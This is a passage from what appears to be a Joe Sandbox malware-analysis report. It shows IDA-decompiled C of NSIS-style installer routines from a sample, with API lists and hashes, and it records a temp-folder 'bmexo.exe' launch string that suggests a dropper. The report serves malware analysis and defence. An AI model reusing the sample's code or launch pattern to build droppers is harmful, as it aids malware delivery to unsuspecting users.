									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a6c == _t156) {
							ShowWindow( *0x7a8aa8, 8);
							if( *0x7a8b2c == _t156) {
								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
							}
							E004045A3(_t171);
							goto L25;
						}
						 *0x7a0758 = 2;
						E004045A3(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404631(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a70, _t156);
						ShowWindow(_t169, 8);
						E004045FF(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8ab0;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a84 = _t134;
				_v8 = _t134;
				E004045FF( *0x7a7a70);
				 *0x7a7a74 = E00404F58(4);
				 *0x7a7a8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045CA(_a4);
				if(( *0x7a8ab8 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a70, _t156);
					if(( *0x7a8ab8 & 0x00000002) != 0) {
						 *0x7a7a70 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045FF( *0x7a7a68);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8ab8 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                          0x00405817
                                          0x0040581d
                                          0x00405827
                                          0x0040582a
                                          0x004059c0
                                          0x004059e4
                                          0x004059e4
                                          0x004059f7
                                          0x00405a15
                                          0x00405a17
                                          0x00405a1f
                                          0x00405a75
                                          0x00405a79
                                          0x00000000
                                          0x00000000
                                          0x00405a7b
                                          0x00405a81
                                          0x00000000
                                          0x00000000
                                          0x00405a8b
                                          0x00405a93
                                          0x00405a96
                                          0x00405b98
                                          0x00000000
                                          0x00405b98
                                          0x00405aa5
                                          0x00405ab0
                                          0x00405ab9
                                          0x00405ac4
                                          0x00405ac7
                                          0x00405ad0
                                          0x00405ad6
                                          0x00405ad9
                                          0x00405ad9
                                          0x00405af1
                                          0x00405afa
                                          0x00405afd
                                          0x00405b04
                                          0x00405b0b
                                          0x00405b13
                                          0x00405b13
                                          0x00405b2a
                                          0x00405b2a
                                          0x00405b31
                                          0x00405b37
                                          0x00405b43
                                          0x00405b4a
                                          0x00405b53
                                          0x00405b55
                                          0x00405b58
                                          0x00405b67
                                          0x00405b6a
                                          0x00405b70
                                          0x00405b71
                                          0x00405b77
                                          0x00405b78
                                          0x00405b79
                                          0x00405b81
                                          0x00405b8c
                                          0x00405b92
                                          0x00405b92
                                          0x00000000
                                          0x00405af1
                                          0x00405a27
                                          0x00405a57
                                          0x00405a5f
                                          0x00405a6a
                                          0x00405a6a
                                          0x00405a70
                                          0x00000000
                                          0x00405a70
                                          0x00405a2b
                                          0x00405a35
                                          0x00000000
                                          0x004059f9
                                          0x004059ff
                                          0x00405a3a
                                          0x00000000
                                          0x00405a43
                                          0x00405a08
                                          0x00405a0d
                                          0x00405a10
                                          0x00000000
                                          0x00405a10
                                          0x004059f7
                                          0x00405830
                                          0x00405834
                                          0x0040583c
                                          0x00405840
                                          0x00405843
                                          0x00405846
                                          0x00405849
                                          0x0040584c
                                          0x0040584d
                                          0x0040584e
                                          0x00405867
                                          0x0040586a
                                          0x00405874
                                          0x00405883
                                          0x0040588b
                                          0x00405893
                                          0x00405898
                                          0x0040589b
                                          0x004058a7
                                          0x004058b0
                                          0x004058b9
                                          0x004058db
                                          0x004058e1
                                          0x004058f2
                                          0x004058f7
                                          0x00405905
                                          0x00405913
                                          0x00405913
                                          0x00405918
                                          0x00405926
                                          0x00405926
                                          0x0040592b
                                          0x0040592e
                                          0x00405933
                                          0x0040593f
                                          0x00405948
                                          0x00405955
                                          0x00405964
                                          0x00405957
                                          0x0040595c
                                          0x0040595c
                                          0x00405970
                                          0x00405970
                                          0x00405984
                                          0x0040598d
                                          0x00405996
                                          0x004059a6
                                          0x004059b2
                                          0x004059b2
                                          0x00000000

                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040586D
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040587C
                                          • GetClientRect.USER32 ref: 004058B9
                                          • GetSystemMetrics.USER32 ref: 004058C0
                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                                          • ShowWindow.USER32(00000000,?), ref: 00405948
                                          • ShowWindow.USER32(?,00000008), ref: 0040595C
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040597D
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040588B
                                            • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                          • GetDlgItem.USER32(?,000003EC), ref: 004059CF
                                          • CreateThread.KERNEL32(00000000,00000000,Function_000057A3,00000000), ref: 004059DD
                                          • CloseHandle.KERNEL32(00000000), ref: 004059E4
                                          • ShowWindow.USER32(00000000), ref: 00405A08
                                          • ShowWindow.USER32(?,00000008), ref: 00405A0D
                                          • ShowWindow.USER32(00000008), ref: 00405A57
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                                          • CreatePopupMenu.USER32 ref: 00405A9C
                                          • AppendMenuW.USER32 ref: 00405AB0
                                          • GetWindowRect.USER32(?,?), ref: 00405AD0
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                                          • OpenClipboard.USER32(00000000), ref: 00405B31
                                          • EmptyClipboard.USER32 ref: 00405B37
                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                                          • GlobalLock.KERNEL32 ref: 00405B4D
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                                          • SetClipboardData.USER32 ref: 00405B8C
                                          • CloseClipboard.USER32 ref: 00405B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                          • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                                          • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                          • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404ABB Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f60;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CB2(0x3fb, _t146);
					E004068F5(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CB2(0x3fb, _t146);
							if(E00406045(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040666E(0x79ff58, _t146);
							_t87 = E00406A3B(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040666E(0x79ff58, _t146);
								_t89 = E00405FE8(0x79ff58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F89(0x79ff58);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F58(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
									E00404F40(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff48);
									} else {
										E00404E77(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b44 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045EC(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
									E00404A14();
								}
								 *0x7a1f78 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f88;
							_v60 = E00404E11;
							_v56 = _t146;
							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F3D(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == 0x7b3800) {
									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
										lstrcatW(_t146, 0x7a6a40);
									}
								}
								 *0x7a1f78 =  *0x7a1f78 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
						E00405F3D(_t146);
					}
					 *0x7a7a78 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045CA(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045CA(_t167);
					E004045FF(_t166);
					_t138 = E00406A3B(8);
					if(_t138 == 0) {
						L53:
						return E00404631(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                          0x00404abb
                                          0x00404ac1
                                          0x00404ac7
                                          0x00404ad4
                                          0x00404ae2
                                          0x00404ae5
                                          0x00404aed
                                          0x00404af3
                                          0x00404af3
                                          0x00404aff
                                          0x00404b02
                                          0x00404b70
                                          0x00404b77
                                          0x00404c4e
                                          0x00404c55
                                          0x00404c64
                                          0x00404c64
                                          0x00404c68
                                          0x00404c72
                                          0x00404c7f
                                          0x00404c81
                                          0x00404c81
                                          0x00404c8f
                                          0x00404c96
                                          0x00404c9d
                                          0x00404ca0
                                          0x00404cdc
                                          0x00404cde
                                          0x00404ce4
                                          0x00404ce9
                                          0x00404ced
                                          0x00404cef
                                          0x00404cef
                                          0x00404d0b
                                          0x00000000
                                          0x00404d0d
                                          0x00404d10
                                          0x00404d1e
                                          0x00404d24
                                          0x00404d25
                                          0x00404d28
                                          0x00404d2b
                                          0x00000000
                                          0x00404d2b
                                          0x00404ca2
                                          0x00404ca4
                                          0x00404ca8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404caa
                                          0x00404caa
                                          0x00404cb7
                                          0x00404cbc
                                          0x00000000
                                          0x00000000
                                          0x00404cc0
                                          0x00404cc2
                                          0x00404cc2
                                          0x00404ccb
                                          0x00404ccd
                                          0x00404cd2
                                          0x00404cd5
                                          0x00404cda
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404cda
                                          0x00404d37
                                          0x00404d41
                                          0x00404d44
                                          0x00404d47
                                          0x00404d4e
                                          0x00404d4e
                                          0x00404d50
                                          0x00404d50
                                          0x00404d55
                                          0x00404d57
                                          0x00404d5f
                                          0x00404d66
                                          0x00404d68
                                          0x00404d73
                                          0x00404d73
                                          0x00404d68
                                          0x00404d83
                                          0x00404d8d
                                          0x00404d95
                                          0x00404db0
                                          0x00404d97
                                          0x00404da0
                                          0x00404da0
                                          0x00404d95
                                          0x00404db5
                                          0x00404dba
                                          0x00404dbf
                                          0x00404dc8
                                          0x00404dc8
                                          0x00404dd1
                                          0x00404dd3
                                          0x00404dd3
                                          0x00404ddf
                                          0x00404de7
                                          0x00404df1
                                          0x00404df1
                                          0x00404df6
                                          0x00000000
                                          0x00404df6
                                          0x00404ca0
                                          0x00404c57
                                          0x00404c5e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404c5e
                                          0x00404b7d
                                          0x00404b86
                                          0x00404ba0
                                          0x00404ba5
                                          0x00404baf
                                          0x00404bb6
                                          0x00404bc2
                                          0x00404bc5
                                          0x00404bc8
                                          0x00404bcf
                                          0x00404bd7
                                          0x00404bda
                                          0x00404bde
                                          0x00404be5
                                          0x00404bed
                                          0x00404c47
                                          0x00404bef
                                          0x00404bf0
                                          0x00404bf7
                                          0x00404c01
                                          0x00404c09
                                          0x00404c16
                                          0x00404c2a
                                          0x00404c2e
                                          0x00404c2e
                                          0x00404c2a
                                          0x00404c33
                                          0x00404c40
                                          0x00404c40
                                          0x00404bed
                                          0x00000000
                                          0x00404ba5
                                          0x00404b93
                                          0x00000000
                                          0x00000000
                                          0x00404b99
                                          0x00000000
                                          0x00404b04
                                          0x00404b11
                                          0x00404b1a
                                          0x00404b27
                                          0x00404b27
                                          0x00404b2e
                                          0x00404b34
                                          0x00404b3d
                                          0x00404b40
                                          0x00404b43
                                          0x00404b4b
                                          0x00404b4e
                                          0x00404b51
                                          0x00404b57
                                          0x00404b5e
                                          0x00404b65
                                          0x00404dfc
                                          0x00404e0e
                                          0x00404b6b
                                          0x00404b6e
                                          0x00000000
                                          0x00404b6e
                                          0x00404b65

                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404B0A
                                          • SetWindowTextW.USER32 ref: 00404B34
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,007A1F88,00000000,?,?), ref: 00404C22
                                          • lstrcatW.KERNEL32 ref: 00404C2E
                                          • SetDlgItemTextW.USER32 ref: 00404C40
                                            • Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5
                                            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406958
                                            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406967
                                            • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 0040696C
                                            • Part of subcall function 004068F5: CharPrevW.USER32(?,?), ref: 0040697F
                                          • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                                          • MulDiv.KERNEL32 ref: 00404D1E
                                            • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                            • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                                            • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: A$C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                          • API String ID: 2624150263-3100334898
                                          • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                          • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                                          • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                          • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                          0x004021b3
                                          0x004021bd
                                          0x004021c7
                                          0x004021d1
                                          0x004021dc
                                          0x004021df
                                          0x004021f9
                                          0x004021fc
                                          0x00402202
                                          0x00402205
                                          0x0040220f
                                          0x00402213
                                          0x00402213
                                          0x00402218
                                          0x00402229
                                          0x00402231
                                          0x004022e8
                                          0x004022e8
                                          0x004022ef
                                          0x00402237
                                          0x00402237
                                          0x00402246
                                          0x0040224a
                                          0x0040224d
                                          0x00402253
                                          0x00402261
                                          0x00402264
                                          0x00402266
                                          0x00402271
                                          0x00402271
                                          0x00402276
                                          0x00402278
                                          0x0040227f
                                          0x0040227f
                                          0x00402282
                                          0x0040228b
                                          0x0040228e
                                          0x00402294
                                          0x00402296
                                          0x004022a0
                                          0x004022a0
                                          0x004022a3
                                          0x004022ac
                                          0x004022af
                                          0x004022b8
                                          0x004022be
                                          0x004022c0
                                          0x004022ce
                                          0x004022ce
                                          0x004022d1
                                          0x004022d7
                                          0x004022d7
                                          0x004022da
                                          0x004022e0
                                          0x004022e6
                                          0x004022fb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004022e6
                                          0x004022f1
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID:
                                          • API String ID: 542301482-0
